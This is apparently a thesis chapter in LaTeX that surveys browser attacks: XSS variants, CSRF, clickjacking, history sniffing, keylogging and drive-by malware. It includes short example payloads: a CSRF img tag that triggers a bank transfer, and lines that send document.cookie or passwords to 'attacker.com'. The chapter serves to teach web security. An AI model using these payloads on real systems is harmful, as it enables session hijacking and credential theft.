\chapter{Security risks in web browsers}
\label{ch:privacyrisk}


% This is for the header on each page
\lhead{Chapter 4. \emph{Security risks in web browsers}}
As discussed earlier, dynamic nature of JavaScript can cause possibility of  unauthorised information flows which can compromise user's private information\cite{privacyflows}. The third party code in websites has access to sensitive information in the web page and if source of the code is not fully trusted or source is compromised, it can lead to many security and privacy risks. 
\section{XSS attacks}
Attackers can exploit the code-injection vulnerability by injecting malicious code into a webpage, causing viewers of that page to unwittingly execute malicious code. This code on execution has access to sensitive information contained in the current page, can steal this information and send it to attacker's web server.

\subsection{Persistent XSS}
Persistent or Stored XSS attacks \cite{XSS} involves an attacker injecting a script into a web application that stores user-supplied data into a server-side data store. Web site will then inserts the data into dynamically assembled pages delivered to all users. The example of such an attack involves a message board or web forum or comment field on a blog that allows the posting of user generated content.

\subsection{Reflected XSS}
In a reflected XSS attack, the victim's request to the server contains malicious script. The response of the website to the victim contains this malicious string. This malicious script can contain code to send victim's cookie or credentials to attacker.  The attacker can send request with malicious string using social media, messengers, unsuspicious emails etc. The websites which reflect user's input as part of the response without input sanitisation are prone to such attacks. 

\subsection{DOM based XSS}
In a DOM-based XSS attack \cite{excessXSS}, the attacker’s malicious script is not sent to the server but is inserted as part of innerHTML and executed at client side itself. DOM based XSS cannot be stopped by server-side filters. Here, the attacker's code is executed when the DOM environment is modified in the victim’s browser by the original client side script.

\section{CSRF attacks}
In a CSRF attack, a malicious user (site) is able to take action on behalf of the victim by sending request to legitimate site from victim's browser. The attacker uses social engineering to deliver the malicious link to victim \cite{csrf}. He can either send victim an email with this link (making it look like a link to somewhere interesting) or post the link on a forum he visits or send message on social media account. The link triggers a cross-origin request to the honest site on behalf of victim. Listing below shows a sample code snippet to launch such attack. The img tag embedded in the form causes the victim’s browser to make a request to \url{http://mybank.com/transfer?amt=1000&to=mallory} with myBank's cookie. Victim should be already logged in to mybank website for attack to be successful. The myBank might assume victim is authorizing a transfer of Rupees 1000  to Mallory once statement is executed.
\begin{lstlisting}
<img src="http://mybank.com/transfer?amt=1000&to=mallory"/>
\end{lstlisting}
CSRF attacks can be triggered not only by HTTP GET requests, but also through HTTP POST requests using HTML form tags. The cross-origin requests launched in a CSRF attack are not restricted by browsers, since SOP allows content inclusion and form submission across origins.

\section{Clickjacking}

In this attack, victim is tricked to click on invisible links to cross-origin site on attacker designed malicious webpage. The attackers embed target cross origin content in iframes, make them transparent by setting opacity to zero and then place them above genuine buttons. The attacker can manipulate mouse clicks of user for malicious purposes without victim having any suspicion or indication that their click is hijacked. Clickjacking is more dangerous than CSRF because  along with the click, user’s credentials as well as CSRF tokens are submitted. There are many online scams which use clickjacking to deceive users.


\section{Privacy violating flows}
Attacker's can exploit XSS, CSRF and clickjacking vulnerabilities to gain information about the victim ,steal personal credentials and compromise privacy of the victim. 
\subsection{Cookie Stealing}
The script embedded in the page run with same privileges as the host and can access cookies for that page. If the attacker is able to inject malicious script in the webpage, then  it can steal cookies and session information between user and website. The script can  send this cookie information to attacker server by adding document.cookie to the URL of image request or by navigating the user's browser to a different URL and triggering an HTTP request to the attacker's server. The attacker can use this cookie to impersonate as genuine user to the website and can mount a session hijack attack.
\begin{lstlisting}
img.src="attacker.com/evil.png"+document.cookie
window.location='http://attacker.com/?cookie='+document.cookie
\end{lstlisting}


\subsection{Sensitive Data Theft Attacks}
Similar to cookie stealing attacks, the attacker can use embedded malicious code to send user sensitive data information to attacker's webserver by adding this sensitive data information to URL of the image.
\begin{lstlisting}
img.src="attacker.com/evil.png"+user_password+accountnumber
\end{lstlisting}

\subsection{History Sniffing}

The browsers render links to websites that user has visited differently than ones those haven’t. The visited website links are shown in purple and the unvisited links are displayed blue by default. The history sniffing code running on the web-page checks whether the browser displays a link as blue or purple. So, the attacker can create a link to the target URL in a hidden part of the page, and then uses the browser's DOM interface to inspect how the link is displayed. If the link is displayed as a visited link, the user has visited the target URL  and attacker can create list of websites visited by the user. 

\subsection{Keylogging Attacks}
Attacker can use embedded scripts to log keystrokes by using event handlers which monitor key presses. The sample code for such attacks :
\begin{lstlisting}
document.onkeypress = listenerfunction ;
\end{lstlisting}
This listener function can be used to record user's keystrokes and these logs can be sent through an HTTP request to attacker's server.

\subsection{Behavior Tracking}
Similarly, like Keylogging attacks, embedded scripts can use event handlers that track mouse and keyboard activity. These event handlers record information about mouse clicks and movements, scrolling behavior of the user, and what portion of the web page was highlighted etc. These techniques are used by many web-analytic companies to track likes and dislikes of the users.

\subsection{Reading page contents}
Several third party scripts read contents of the page varying from specific element to the full document. Such actions are common for scripts used for ad-retargetting purpose\cite{Scriptinspector}. Based on user's shopping or search history, the relevant ads are served to the user. However, such information flows violate the privacy of the users. 

\section{Other security vulnerabilities}

\subsection{Unintended page modifications}
Many websites insert third party advertisements in their web pages to generate revenue. The website developers mark certain sections in page (using tags like adPos) where such ads can be inserted. However, malicious third party scripts may misuse their privileges and can inject advertisements in unintended places by modifying the DOM elements. Such behaviour affects the integrity of the website.

\subsection{Web-based Malware}
Some malicious websites try to install a malware binary, also called `drive-by download' in victim's computer automatically without user intervention. The installed malware often enables an adversary to gain remote control over the compromised computer system and can be used to steal sensitive information\cite{webmalware}. The malware downloads can be triggered using JavaScript code to fetch an executable and automatic installation by by tricking users to click on such links by social engineering. Malvertisements \cite{Malvertisement} use  malicious banner ads to install malware on victim machines. Such malvertisements can be a Flash programs that look like regular ads but contain malicious code which can either redirect users to attacker's website or download malware and attack victim's sytem directly. Malicious ads can also be implemented without Flash by simply redirecting the destination of the ad.
